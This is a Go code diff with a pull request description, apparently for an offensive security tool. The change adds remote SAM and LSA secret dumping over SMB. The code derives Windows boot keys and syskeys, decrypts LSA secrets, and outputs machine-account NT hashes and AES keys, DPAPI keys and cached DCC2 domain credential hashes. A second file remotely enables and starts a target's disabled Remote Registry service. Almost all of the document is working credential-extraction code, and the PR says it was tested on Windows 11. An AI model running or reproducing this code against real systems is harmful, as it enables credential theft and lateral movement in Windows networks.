+				entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0], Value: parts[1]})
+			} else {
+				entries = append(entries, &smbfern.LsaSecretEntry{Key: "Cached hash", Value: clean})
+			}
+		}
+		if len(entries) > 0 {
+			results = append(results, &smbfern.LsaSecret{
+				Name:    "[*] Cached Domain Credentials",
+				Entries: entries,
+			})
+		}
+	}
+
+	return results, errors, nil
+}
+
+// appendLSASecret converts a PrintableLSASecret to Fern type and appends to results.
+func appendLSASecret(results []*smbfern.LsaSecret, ps *PrintableLSASecret, log svc1log.Logger, name string) []*smbfern.LsaSecret {
+	var entries []*smbfern.LsaSecretEntry
+	for _, secretStr := range ps.secrets {
+		if strings.Contains(secretStr, ": ") {
+			parts := strings.SplitN(secretStr, ": ", 2)
+			entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0], Value: parts[1]})
+		} else if strings.Contains(secretStr, ":") {
+			parts := strings.SplitN(secretStr, ":", 3)
+			if len(parts) == 3 {
+				entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0] + ":" + parts[1], Value: parts[2]})
+			} else if len(parts) == 2 {
+				entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0], Value: parts[1]})
+			} else {
+				entries = append(entries, &smbfern.LsaSecretEntry{Key: "", Value: secretStr})
+			}
+		} else {
+			entries = append(entries, &smbfern.LsaSecretEntry{Key: "", Value: secretStr})
+		}
+	}
+	if ps.extraSecret != "" {
+		parts := strings.SplitN(ps.extraSecret, ":", 3)
+		if len(parts) == 3 {
+			entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0] + ":" + parts[1], Value: parts[2]})
+		} else if len(parts) == 2 {
+			entries = append(entries, &smbfern.LsaSecretEntry{Key: parts[0], Value: parts[1]})
+		} else {
+			entries = append(entries, &smbfern.LsaSecretEntry{Key: "", Value: ps.extraSecret})
+		}
+	}
+	if len(entries) > 0 {
+		results = append(results, &smbfern.LsaSecret{Name: ps.secretType, Entries: entries})
+		log.Info("Extracted LSA secret (offline)", svc1log.SafeParam("name", name))
+	}
+	return results
+}
+
+// --- Internal helpers ---
+
+func getBootKeyFromHive(hive *RegistryHive) ([]byte, error) {
+	root, err := hive.RootKey()
+	if err != nil {
+		return nil, err
+	}
+
+	// Find current control set number
+	selectKey, err := root.OpenSubKey("Select")
+	if err != nil {
+		return nil, fmt.Errorf("failed to open Select key: %v", err)
+	}
+	current, err := selectKey.GetValueDWORD("Current")
+	if err != nil {
+		return nil, fmt.Errorf("failed to read Select\\Current: %v", err)
+	}
+	controlSet := fmt.Sprintf("ControlSet%03d", current)
+
+	p := []byte{0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7}
+	scrambledKey := make([]byte, 0, 16)
+
+	for _, keyName := range []string{"JD", "Skew1", "GBG", "Data"} {
+		path := fmt.Sprintf(`%s\Control\Lsa\%s`, controlSet, keyName)
+		key, err := root.OpenSubKey(path)
+		if err != nil {
+			return nil, fmt.Errorf("failed to open %s: %v", path, err)
+		}
+		className := key.ClassName()
+		if className == "" {
+			return nil, fmt.Errorf("empty class name for %s", path)
+		}
+		classBytes, err := hex.DecodeString(className)
+		if err != nil {
+			return nil, fmt.Errorf("failed to decode class name hex %q for %s: %v", className, path, err)
+		}
+		scrambledKey = append(scrambledKey, classBytes...)
+	}
+
+	if len(scrambledKey) < 16 {
+		return nil, fmt.Errorf("scrambled key too short: %d bytes", len(scrambledKey))
+	}
+
+	result := make([]byte, 16)
+	for i := 0; i < 16; i++ {
+		result[i] = scrambledKey[p[i]]
+	}
+	return result, nil
+}
+
+func getSysKeyFromHive(samHive *RegistryHive, bootKey []byte) ([]byte, error) {
+	root, err := samHive.RootKey()
+	if err != nil {
+		return nil, err
+	}
+
+	acctKey, err := root.OpenSubKey(`SAM\Domains\Account`)
+	if err != nil {
+		return nil, fmt.Errorf("failed to open Account key: %v", err)
+	}
+	fVal, err := acctKey.GetValue("F")
+	if err != nil {
+		return nil, fmt.Errorf("failed to read Account\\F: %v", err)
+	}
+
+	f := &domainAccountF{}
+	if err = f.unmarshal(fVal.Data); err != nil {
+		return nil, err
+	}
+
+	sysKey := make([]byte, 16)
+	if f.Revision == 3 {
+		samAesData := samKeyDataAes{}
+		if err = binary.Read(bytes.NewReader(f.Data), binary.LittleEndian, &samAesData); err != nil {
+			return nil, err
+		}
+		tmpSysKey, err := DecryptAESSysKey(bootKey, samAesData.Data[:samAesData.DataLen], samAesData.Salt[:])
+		if err != nil {
+			return nil, err
+		}
+		copy(sysKey, tmpSysKey)
+	} else if f.Revision == 2 {
+		samData := &samKeyData{}
+		if err = binary.Read(bytes.NewReader(f.Data), binary.LittleEndian, samData); err != nil {
+			return nil, err
+		}
+		encSysKey := append(samData.Key[:], samData.Checksum[:]...)
+		tmpSysKey, err := DecryptRC4SysKey(bootKey, encSysKey, samData.Salt[:])
+		if err != nil {
+			return nil, err
+		}
+		input := []byte{}
+		input = append(input, tmpSysKey[:16]...)
+		input = append(input, S2...)
+		input = append(input, tmpSysKey[:16]...)
+		input = append(input, S1...)
+		checksum := md5.Sum(input)
+		if !bytes.Equal(checksum[:], tmpSysKey[16:]) {
+			return nil, fmt.Errorf("syskey checksum failed")
+		}
+		copy(sysKey, tmpSysKey[:16])
+	} else {
+		return nil, fmt.Errorf("unknown DOMAIN_ACCOUNT_F revision: %d", f.Revision)
+	}
+
+	return sysKey, nil
+}
+
+func getOSBuildFromHive(systemHive *RegistryHive) int {
+	root, err := systemHive.RootKey()
+	if err != nil {
+		return 22000 // default to modern Windows
+	}
+	selectKey, err := root.OpenSubKey("Select")
+	if err != nil {
+		return 22000
+	}
+	current, err := selectKey.GetValueDWORD("Current")
+	if err != nil {
+		return 22000
+	}
+
+	// Try SOFTWARE first (won't be in SYSTEM hive), then try a heuristic
+	// The CurrentVersion key is under HKLM\SOFTWARE, not SYSTEM.
+	// Since we only have the SYSTEM hive, we default to modern build to use AES path.
+	// This is safe: AES format detection is based on szNT field, not build alone.
+	_ = current
+	return 22000
+}
+
+func getLSAKeyFromHive(securityHive *RegistryHive, bootKey []byte) ([]byte, bool, error) {
+	root, err := securityHive.RootKey()
+	if err != nil {
+		return nil, false, err
+	}
+
+	// Try Vista+ PolEKList first
+	vistaStyle := true
+	polKey, err := root.OpenSubKey(`Policy\PolEKList`)
+	if err != nil {
+		vistaStyle = false
+		polKey, err = root.OpenSubKey(`Policy\PolSecretEncryptionKey`)
+		if err != nil {
+			return nil, false, fmt.Errorf("failed to find LSA key (tried PolEKList and PolSecretEncryptionKey): %v", err)
+		}
+	}
+
+	defVal, err := polKey.GetDefaultValue()
+	if err != nil {
+		return nil, false, fmt.Errorf("failed to read LSA key value: %v", err)
+	}
+
+	data := defVal.Data
+	if len(data) == 0 {
+		return nil, false, fmt.Errorf("empty LSA key data")
+	}
+
+	var lsaKey []byte
+	if vistaStyle {
+		lsaSecretRec := &lsaSecret{}
+		if err := lsaSecretRec.unmarshal(data); err != nil {
+			return nil, false, fmt.Errorf("failed to unmarshal LSA secret: %v", err)
+		}
+		encData := lsaSecretRec.EncryptedData
+		if len(encData) < 32 {
+			return nil, false, fmt.Errorf("LSA encrypted data too short: %d", len(encData))
+		}
+		tmpKey := SHA256(bootKey, encData[:32], 0)
+		plainText, err := DecryptAES(tmpKey, encData[32:], nil)
+		if err != nil {
+			return nil, false, err
+		}
+		blob := &lsaSecretBlob{}
+		blob.unmarshal(plainText)
+		if len(blob.Secret) < 84 {
+			return nil, false, fmt.Errorf("LSA secret blob too short for key: %d", len(blob.Secret))
+		}
+		lsaKey = blob.Secret[52:84]
+	} else {
+		h := md5.New()
+		h.Write(bootKey)
+		for i := 0; i < 1000; i++ {
+			h.Write(data[60:76])
+		}
+		tmpKey := h.Sum(nil)
+		c1, err := rc4.NewCipher(tmpKey[:])
+		if err != nil {
+			return nil, false, err
+		}
+		plaintext := make([]byte, 48)
+		c1.XORKeyStream(plaintext, data[12:60])
+		lsaKey = plaintext[0x10:0x20]
+	}
+
+	return lsaKey, vistaStyle, nil
+}
+
+func parseSecretFromHive(systemHive *RegistryHive, name string, secretItem []byte) *PrintableLSASecret {
+	if len(secretItem) == 0 {
+		return nil
+	}
+	if bytes.Equal(secretItem[:2], []byte{0, 0}) {
+		return nil
+	}
+
+	upperName := strings.ToUpper(name)
+	result := &PrintableLSASecret{secretType: "[*] " + name}
+
+	if strings.HasPrefix(upperName, "_SC_") {
+		secretDecoded, err := encoder.FromUnicodeString(secretItem)
+		if err != nil {
+			return nil
+		}
+		svcUser := getServiceUserFromHive(systemHive, name[4:])
+		result.secrets = append(result.secrets, fmt.Sprintf("%s: %s", svcUser, secretDecoded))
+	} else if strings.HasPrefix(upperName, "ASPNET_WP_PASSWORD") {
+		secretDecoded, err := encoder.FromUnicodeString(secretItem)
+		if err != nil {
+			return nil
+		}
+		result.secrets = append(result.secrets, fmt.Sprintf("ASPNET: %s", secretDecoded))
+	} else if strings.HasPrefix(upperName, "DPAPI_SYSTEM") {
+		dpapi := &dpapiSystem{}
+		if err := dpapi.unmarshal(secretItem); err != nil {
+			return nil
+		}
+		result.secrets = append(result.secrets, fmt.Sprintf("dpapi_machinekey: 0x%x", dpapi.MachineKey))
+		result.secrets = append(result.secrets, fmt.Sprintf("dpapi_userkey: 0x%x", dpapi.UserKey))
+	} else if strings.HasPrefix(upperName, "$MACHINE.ACC") {
+		h := md4.New()
+		h.Write(secretItem)
+		hostname, domain := getHostnameAndDomainFromHive(systemHive)
+		printname := "$MACHINE.ACC"
+		if hostname != "" {
+			printname = strings.ToUpper(hostname) + "$"
+		}
+		result.secrets = append(result.secrets, fmt.Sprintf("%s (NT Hash): %x", printname, h.Sum(nil)))
+		if domain != "" {
+			aes128Key, aes256Key, err := CalcMachineAESKeys(hostname, domain, secretItem)
+			if err == nil {
+				result.secrets = append(result.secrets, fmt.Sprintf("%s:AES_128_key:%x", printname, aes128Key))
+				result.secrets = append(result.secrets, fmt.Sprintf("%s:AES_256_key:%x", printname, aes256Key))
+			}
+		}
+		result.extraSecret = fmt.Sprintf("%s:plain_password_hex:%x", printname, secretItem)
+	} else if strings.HasPrefix(upperName, "NL$KM") {
+		if len(secretItem) >= 16 {
+			result.secrets = append(result.secrets, fmt.Sprintf("NL$KM: 0x%x", secretItem[:16]))
+		}
+	} else if strings.HasPrefix(upperName, "CACHEDDEFAULTPASSWORD") {
+		secretDecoded, err := encoder.FromUnicodeString(secretItem)
+		if err != nil {
+			return nil
+		}
+		result.secrets = append(result.secrets, fmt.Sprintf("(Unknown user): %s", secretDecoded))
+	}
+
+	if len(result.secrets) == 0 && result.extraSecret == "" {
+		return nil
+	}
+	return result
+}
+
+func getServiceUserFromHive(systemHive *RegistryHive, serviceName string) string {
+	root, err := systemHive.RootKey()
+	if err != nil {
+		return "(unknown user)"
+	}
+	selectKey, err := root.OpenSubKey("Select")
+	if err != nil {
+		return "(unknown user)"
+	}
+	current, err := selectKey.GetValueDWORD("Current")
+	if err != nil {
+		return "(unknown user)"
+	}
+	path := fmt.Sprintf(`ControlSet%03d\Services\%s`, current, serviceName)
+	svcKey, err := root.OpenSubKey(path)
+	if err != nil {
+		return "(unknown user)"
+	}
+	objName, err := svcKey.GetValueString("ObjectName")
+	if err != nil {
+		return "(unknown user)"
+	}
+	if strings.HasPrefix(objName, ".\\") {
+		objName = objName[2:]
+	}
+	return objName
+}
+
+func getHostnameAndDomainFromHive(systemHive *RegistryHive) (hostname, domain string) {
+	root, err := systemHive.RootKey()
+	if err != nil {
+		return "", ""
+	}
+	selectKey, err := root.OpenSubKey("Select")
+	if err != nil {
+		return "", ""
+	}
+	current, err := selectKey.GetValueDWORD("Current")
+	if err != nil {
+		return "", ""
+	}
+	path := fmt.Sprintf(`ControlSet%03d\Services\Tcpip\Parameters`, current)
+	tcpKey, err := root.OpenSubKey(path)
+	if err != nil {
+		return "", ""
+	}
+	hostname, _ = tcpKey.GetValueString("Hostname")
+	domain, _ = tcpKey.GetValueString("Domain")
+	return
+}
+
+func getCachedHashesFromHive(ctx context.Context, securityHive *RegistryHive, bootKey, lsaKey []byte, vistaStyle bool) []string {
+	log := svc1log.FromContext(ctx)
+	root, err := securityHive.RootKey()
+	if err != nil {
+		return nil
+	}
+
+	cacheKey, err := root.OpenSubKey(`Cache`)
+	if err != nil {
+		// Also try "Security\Cache" in case root is SECURITY
+		cacheKey, err = root.OpenSubKey(`Security\Cache`)
+		if err != nil {
+			return nil
+		}
+	}
+
+	values, err := cacheKey.Values()
+	if err != nil {
+		return nil
+	}
+
+	// Find NL$IterationCount
+	iterCount := 10240
+	for _, v := range values {
+		if strings.EqualFold(v.Name, "NL$IterationCount") {
+			if len(v.Data) >= 4 {
+				ic := binary.LittleEndian.Uint32(v.Data[:4])
+				if ic > 10240 {
+					iterCount = int(ic)
+				} else if ic != 0 {
+					iterCount = int(ic) * 1024
+				}
+			}
+			break
+		}
+	}
+
+	// Get NL$KM key for decrypting cached creds
+	nlkmKey, err := getNLKMKeyFromHive(securityHive, lsaKey, vistaStyle)
+	if err != nil {
+		log.Info("Failed to get NL$KM key", svc1log.SafeParam("error", err.Error()))
+		return nil
+	}
+
+	var result []string
+	for _, v := range values {
+		if strings.EqualFold(v.Name, "NL$Control") || strings.EqualFold(v.Name, "NL$IterationCount") {
+			continue
+		}
+		data := v.Data
+		if len(data) < 96 {
+			continue
+		}
+
+		record := &nlRecord{}
+		if err := record.unmarshal(data); err != nil {
+			continue
+		}
+		if record.UserLength == 0 {
+			continue
+		}
+
+		// Check IV is non-zero (entry contains encrypted data)
+		nilIV := make([]byte, 16)
+		if bytes.Equal(record.IV[:], nilIV) {
+			continue
+		}
+		if record.Flags&1 != 1 {
+			continue
+		}
+
+		// Decrypt using NL$KM key bytes [16:32] — matches original getNLKMSecretKey + DecryptAES pattern
+		plaintext, err := DecryptAES(nlkmKey[16:32], record.EncryptedData, record.IV[:])
+		if err != nil {
+			continue
+		}
+		if len(plaintext) < 0x48+int(record.UserLength) {
+			continue
+		}
+
+		// encHash is first 16 bytes of decrypted data
+		encHash := plaintext[:0x10]
+		// User data starts at offset 0x48
+		userData := plaintext[0x48:]
+
+		if len(userData) < int(record.UserLength) {
+			continue
+		}
+		username, err := encoder.FromUnicodeString(userData[:record.UserLength])
+		if err != nil {
+			continue
+		}
+
+		// Skip past username (padded) + domain name (padded) to get DNS domain
+		offset := padDWORD(uint64(record.UserLength)) + padDWORD(uint64(record.DomainNameLength))
+		if int(offset)+int(record.DNSDomainNameLength) > len(userData) {
+			continue
+		}
+		dnsDomain, err := encoder.FromUnicodeString(userData[offset : offset+uint64(record.DNSDomainNameLength)])
+		if err != nil {
+			continue
+		}
+
+		if username == "" {
+			continue
+		}
+
+		hashStr := fmt.Sprintf("%s/%s:$DCC2$%d#%s#%x",
+			strings.ToUpper(dnsDomain), strings.ToLower(username),
+			iterCount, strings.ToLower(username), encHash)
+
+		result = append(result, hashStr)
+		log.Info("Extracted cached credential (offline)", svc1log.SafeParam("username", username))
+	}
+	return result
+}
+
+// getNLKMKeyFromHive returns the raw decrypted NL$KM data (matching the global NLKMKey behavior).
+// The caller should use bytes [16:32] as the actual decryption key for cached creds.
+func getNLKMKeyFromHive(securityHive *RegistryHive, lsaKey []byte, vistaStyle bool) ([]byte, error) {
+	root, err := securityHive.RootKey()
+	if err != nil {
+		return nil, err
+	}
+
+	nlkmKeyNode, err := root.OpenSubKey(`Policy\Secrets\NL$KM\CurrVal`)
+	if err != nil {
+		return nil, fmt.Errorf("NL$KM secret not found: %v", err)
+	}
+
+	defVal, err := nlkmKeyNode.GetDefaultValue()
+	if err != nil {
+		return nil, err
+	}
+
+	value := defVal.Data
+	if len(value) == 0 || !vistaStyle {
+		return nil, fmt.Errorf("NL$KM secret empty or pre-Vista")
+	}
+
+	record := &lsaSecret{}
+	if err := record.unmarshal(value); err != nil {
+		return nil, err
+	}
+	if len(record.EncryptedData) < 32 {
+		return nil, fmt.Errorf("NL$KM encrypted data too short")
+	}
+
+	tmpKey := SHA256(lsaKey, record.EncryptedData[:32], 0)
+	// Return raw decrypted data (NOT parsed via lsaSecretBlob)
+	// Matches original getNLKMSecretKey behavior where NLKMKey = first 32 bytes of raw result
+	rawResult, err := DecryptAES(tmpKey, record.EncryptedData[32:], nil)
+	if err != nil {
+		return nil, err
+	}
+	if len(rawResult) < 32 {
+		return nil, fmt.Errorf("NL$KM decrypted data too short: %d", len(rawResult))
+	}
+	result := make([]byte, 32)
+	copy(result, rawResult[:32])
+	return result, nil
+}

--- a/internal/protocol/smb/svcctl.go
+++ b/internal/protocol/smb/svcctl.go
@@ -1,0 +1,327 @@
+package smb
+
+import (
+	"context"
+	"encoding/binary"
+	"fmt"
+	"time"
+	"unicode/utf16"
+
+	gosmb "github.com/jfjallid/go-smb/smb"
+	"github.com/jfjallid/go-smb/smb/dcerpc"
+	"github.com/jfjallid/go-smb/smb/dcerpc/msrrp"
+	svc1log "github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+)
+
+// Minimal SVCCTL (MS-SCMR) client for starting the Remote Registry service.
+// Only implements the operations needed to start/query a service.
+
+const (
+	svcctlPipe    = "svcctl"
+	svcctlUUID    = "367ABB81-9844-35F1-AD32-98F038001003"
+	svcctlMajor   = uint16(2)
+	svcctlMinor   = uint16(0)
+	svcHandleSize = 20
+
+	// Opcodes
+	opCloseServiceHandle   = 0
+	opQueryServiceStatus   = 6
+	opChangeServiceConfigW = 11
+	opOpenSCManagerW       = 15
+	opOpenServiceW         = 16
+	opStartServiceW        = 19
+
+	// Service states
+	svcStopped = 1
+	svcRunning = 4
+
+	// Start types
+	svcStartDemand   = 3          // SERVICE_DEMAND_START (manual)
+	svcStartDisabled = 4          // SERVICE_START_DISABLED
+	svcNoChange      = 0xFFFFFFFF // SERVICE_NO_CHANGE
+
+	// Error codes
+	errServiceDisabled       = 0x00000422
+	errServiceAlreadyRunning = 0x00000420
+
+	// Access masks
+	scManagerConnect = 0x0001
+	svcQueryStatus   = 0x0004
+	svcChangeConfig  = 0x0002
+	svcQueryConfig   = 0x0001
+	svcStart         = 0x0010
+	svcStop          = 0x0020
+)
+
+// EnsureRemoteRegistryStarted connects to the SVCCTL service and starts
+// the RemoteRegistry service if it's not already running. Returns true
+// if the service was started by us (and should be stopped on cleanup).
+func EnsureRemoteRegistryStarted(ctx context.Context, session *gosmb.Connection) (startedByUs bool, err error) {
+	log := svc1log.FromContext(ctx)
+
+	f, err := session.OpenFile("IPC$", svcctlPipe)
+	if err != nil {
+		return false, fmt.Errorf("failed to open svcctl pipe: %v", err)
+	}
+	defer func() { _ = f.CloseFile() }()
+
+	bind, err := dcerpc.Bind(f, svcctlUUID, svcctlMajor, svcctlMinor, msrrp.NDRUuid)
+	if err != nil {
+		return false, fmt.Errorf("failed to bind to SVCCTL: %v", err)
+	}
+
+	// Open SCM
+	scHandle, err := svcctlOpenSCManager(bind)
+	if err != nil {
+		return false, fmt.Errorf("OpenSCManagerW failed: %v", err)
+	}
+	defer svcctlCloseHandle(bind, scHandle)
+
+	// Open RemoteRegistry service
+	svcHandle, err := svcctlOpenService(bind, scHandle, "RemoteRegistry")
+	if err != nil {
+		return false, fmt.Errorf("OpenServiceW(RemoteRegistry) failed: %v", err)
+	}
+	defer svcctlCloseHandle(bind, svcHandle)
+
+	// Check current status
+	state, err := svcctlQueryStatus(bind, svcHandle)
+	if err != nil {
+		return false, fmt.Errorf("QueryServiceStatus failed: %v", err)
+	}
+
+	if state == svcRunning {
+		log.Info("Remote Registry service is already running")
+		return false, nil
+	}
+
+	log.Info("Starting Remote Registry service")
+	err = svcctlStartService(bind, svcHandle)
+	if err != nil {
+		// If service is disabled, change startup type to manual and retry
+		if isServiceDisabledError(err) {
+			log.Info("Remote Registry service is disabled, changing to manual start type")
+			changeErr := svcctlChangeStartType(bind, svcHandle, svcStartDemand)
+			if changeErr != nil {
+				return false, fmt.Errorf("failed to change service start type: %v", changeErr)
+			}
+			err = svcctlStartService(bind, svcHandle)
+			if err != nil {
+				return false, fmt.Errorf("StartServiceW failed after enabling: %v", err)
+			}
+		} else {
+			return false, fmt.Errorf("StartServiceW failed: %v", err)
+		}
+	}
+
+	// Wait for service to start
+	for i := 0; i < 10; i++ {
+		time.Sleep(1 * time.Second)
+		state, err = svcctlQueryStatus(bind, svcHandle)
+		if err != nil {
+			return false, err
+		}
+		if state == svcRunning {
+			log.Info("Remote Registry service started successfully")
+			return true, nil
+		}
+	}
+
+	return false, fmt.Errorf("Remote Registry service did not start within 10 seconds")
+}
+
+// --- NDR-encoded SVCCTL RPC calls ---
+
+func svcctlOpenSCManager(bind *dcerpc.ServiceBind) ([]byte, error) {
+	// OpenSCManagerW request:
+	//   lpMachineName: NDR pointer to empty Unicode string
+	//   lpDatabaseName: NULL pointer
+	//   dwDesiredAccess: SC_MANAGER_CONNECT
+	var req []byte
+
+	// lpMachineName - pointer to Unicode null string
+	req = appendNDRUnicodePtr(req, "\x00")
+	// lpDatabaseName - NULL pointer
+	req = appendUint32(req, 0)
+	// dwDesiredAccess
+	req = appendUint32(req, scManagerConnect)
+
+	resp, err := bind.MakeIoCtlRequest(opOpenSCManagerW, req)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(resp) < svcHandleSize+4 {
+		return nil, fmt.Errorf("OpenSCManagerW response too short: %d", len(resp))
+	}
+
+	retCode := binary.LittleEndian.Uint32(resp[svcHandleSize:])
+	if retCode != 0 {
+		return nil, fmt.Errorf("OpenSCManagerW returned error: 0x%08x", retCode)
+	}
+
+	handle := make([]byte, svcHandleSize)
+	copy(handle, resp[:svcHandleSize])
+	return handle, nil
+}
+
+func svcctlOpenService(bind *dcerpc.ServiceBind, scHandle []byte, serviceName string) ([]byte, error) {
+	// OpenServiceW request:
+	//   hSCManager: 20-byte context handle
+	//   lpServiceName: NDR Unicode string
+	//   dwDesiredAccess: SERVICE_QUERY_STATUS | SERVICE_START
+	var req []byte
+
+	req = append(req, scHandle...)
+	req = appendNDRUnicode(req, serviceName)
+	req = appendUint32(req, svcQueryStatus|svcQueryConfig|svcChangeConfig|svcStart|svcStop)
+
+	resp, err := bind.MakeIoCtlRequest(opOpenServiceW, req)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(resp) < svcHandleSize+4 {
+		return nil, fmt.Errorf("OpenServiceW response too short: %d", len(resp))
+	}
+
+	retCode := binary.LittleEndian.Uint32(resp[svcHandleSize:])
+	if retCode != 0 {
+		return nil, fmt.Errorf("OpenServiceW returned error: 0x%08x", retCode)
+	}
+
+	handle := make([]byte, svcHandleSize)
+	copy(handle, resp[:svcHandleSize])
+	return handle, nil
+}
+
+func svcctlQueryStatus(bind *dcerpc.ServiceBind, svcHandle []byte) (uint32, error) {
+	resp, err := bind.MakeIoCtlRequest(opQueryServiceStatus, svcHandle)
+	if err != nil {
+		return 0, err
+	}
+
+	// SERVICE_STATUS structure: 7 DWORDs = 28 bytes + return code
+	if len(resp) < 32 {
+		return 0, fmt.Errorf("QueryServiceStatus response too short: %d", len(resp))
+	}
+
+	retCode := binary.LittleEndian.Uint32(resp[28:])
+	if retCode != 0 {
+		return 0, fmt.Errorf("QueryServiceStatus returned error: 0x%08x", retCode)
+	}
+
+	// dwCurrentState is at offset 4 in SERVICE_STATUS
+	state := binary.LittleEndian.Uint32(resp[4:8])
+	return state, nil
+}
+
+func svcctlStartService(bind *dcerpc.ServiceBind, svcHandle []byte) error {
+	// StartServiceW: handle + argc(0) + argv(NULL)
+	var req []byte
+	req = append(req, svcHandle...)
+	req = appendUint32(req, 0) // argc
+	req = appendUint32(req, 0) // argv = NULL
+
+	resp, err := bind.MakeIoCtlRequest(opStartServiceW, req)
+	if err != nil {
+		return err
+	}
+
+	if len(resp) < 4 {
+		return fmt.Errorf("StartServiceW response too short")
+	}
+
+	retCode := binary.LittleEndian.Uint32(resp[:4])
+	if retCode != 0 {
+		if retCode == errServiceAlreadyRunning {
+			return nil
+		}
+		return fmt.Errorf("StartServiceW returned error: 0x%08x", retCode)
+	}
+	return nil
+}
+
+func svcctlChangeStartType(bind *dcerpc.ServiceBind, svcHandle []byte, startType uint32) error {
+	// ChangeServiceConfigW (opcode 11)
+	// All fields set to SERVICE_NO_CHANGE except dwStartType
+	var req []byte
+	req = append(req, svcHandle...)
+	req = appendUint32(req, svcNoChange) // dwServiceType
+	req = appendUint32(req, startType)   // dwStartType
+	req = appendUint32(req, svcNoChange) // dwErrorControl
+	req = appendUint32(req, 0)           // lpBinaryPathName = NULL
+	req = appendUint32(req, 0)           // lpLoadOrderGroup = NULL
+	req = appendUint32(req, 0)           // lpdwTagId = NULL
+	req = appendUint32(req, 0)           // lpDependencies = NULL
+	req = appendUint32(req, 0)           // dwDependSize = 0
+	req = appendUint32(req, 0)           // lpServiceStartName = NULL
+	req = appendUint32(req, 0)           // lpPassword = NULL
+	req = appendUint32(req, 0)           // dwPwSize = 0
+	req = appendUint32(req, 0)           // lpDisplayName = NULL
+
+	resp, err := bind.MakeIoCtlRequest(opChangeServiceConfigW, req)
+	if err != nil {
+		return err
+	}
+
+	if len(resp) < 8 {
+		return fmt.Errorf("ChangeServiceConfigW response too short: %d", len(resp))
+	}
+
+	// Response: lpdwTagId (4 bytes) + ReturnValue (4 bytes)
+	retCode := binary.LittleEndian.Uint32(resp[4:8])
+	if retCode != 0 {
+		return fmt.Errorf("ChangeServiceConfigW returned error: 0x%08x", retCode)
+	}
+	return nil
+}
+
+func isServiceDisabledError(err error) bool {
+	return err != nil && fmt.Sprintf("%v", err) == fmt.Sprintf("StartServiceW returned error: 0x%08x", errServiceDisabled)
+}
+
+func svcctlCloseHandle(bind *dcerpc.ServiceBind, handle []byte) {
+	_, _ = bind.MakeIoCtlRequest(opCloseServiceHandle, handle)
+}
+
+// --- NDR encoding helpers ---
+
+func appendUint32(buf []byte, v uint32) []byte {
+	b := make([]byte, 4)
+	binary.LittleEndian.PutUint32(b, v)
+	return append(buf, b...)
+}
+
+// appendNDRUnicodePtr encodes a unique pointer to an NDR-conformant Unicode string.
+func appendNDRUnicodePtr(buf []byte, s string) []byte {
+	// Referent ID (non-zero = valid pointer)
+	buf = appendUint32(buf, 0x00020000)
+	return appendNDRUnicode(buf, s)
+}
+
+// appendNDRUnicode encodes an NDR conformant-varying Unicode string (no pointer header).
+func appendNDRUnicode(buf []byte, s string) []byte {
+	runes := []rune(s)
+	// Include null terminator
+	u16 := utf16.Encode(append(runes, 0))
+	count := uint32(len(u16))
+
+	// Max count
+	buf = appendUint32(buf, count)
+	// Offset
+	buf = appendUint32(buf, 0)
+	// Actual count
+	buf = appendUint32(buf, count)
+	// UTF-16LE data
+	for _, c := range u16 {
+		b := make([]byte, 2)
+		binary.LittleEndian.PutUint16(b, c)
+		buf = append(buf, b...)
+	}
+	// Pad to 4-byte boundary
+	if len(u16)*2%4 != 0 {
+		buf = append(buf, make([]byte, 4-len(u16)*2%4)...)
+	}
+	return buf
+}


### PR DESCRIPTION
## Summary
- Adds SVCCTL (MS-SCMR) client to auto-start the Remote Registry service on Windows 11 where it's disabled by default, including changing the startup type from Disabled to Manual
- Adds a registry hive file (regf) parser and RegSaveKey-based fallback for offline SAM/LSA extraction when direct remote registry reads are blocked (Win11 SECURITY hive)
- Both SAMDUMP and LSADUMP now try direct registry reads first, then transparently fall back to the save-hive-download-parse approach

## Test plan
- [x] Tested against Windows 11 22H2 (Build 22621) with Remote Registry disabled
- [x] SAMDUMP extracts all local user NT hashes (Administrator, Guest, service accounts)
- [x] LSADUMP extracts $MACHINE.ACC (NT hash + AES keys), DPAPI_SYSTEM, NL$KM, and cached domain credentials (DCC2)
- [x] `./godelw verify` passes clean
- [ ] Verify backward compat on Server 2019/2022 where Remote Registry may already be running

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> High risk because it changes credential-extraction behavior and adds new low-level SMB/RPC + offline hive parsing/crypto logic, including starting/enabling the target's `RemoteRegistry` service and downloading registry hives.
> 
> **Overview**
> Fixes `samdump`/`lsadump` reliability on Windows 11 by **auto-starting Remote Registry** when the `winreg` pipe is unavailable and by adding a **RegSaveKey-based fallback** when direct remote registry reads are blocked.
> 
> Both dump paths now try direct registry extraction first, then (on failure) save `SYSTEM`+`SAM`/`SECURITY` hives to a temp file on the target, download and delete them over SMB, and parse/decrypt secrets offline using a new minimal `regf` hive parser and offline SAM/LSA extraction routines (including cached credential parsing).
> 
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit 1e704f35731634e17a71853da9ddf818cc238554. This will update automatically on new commits. Configure [here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->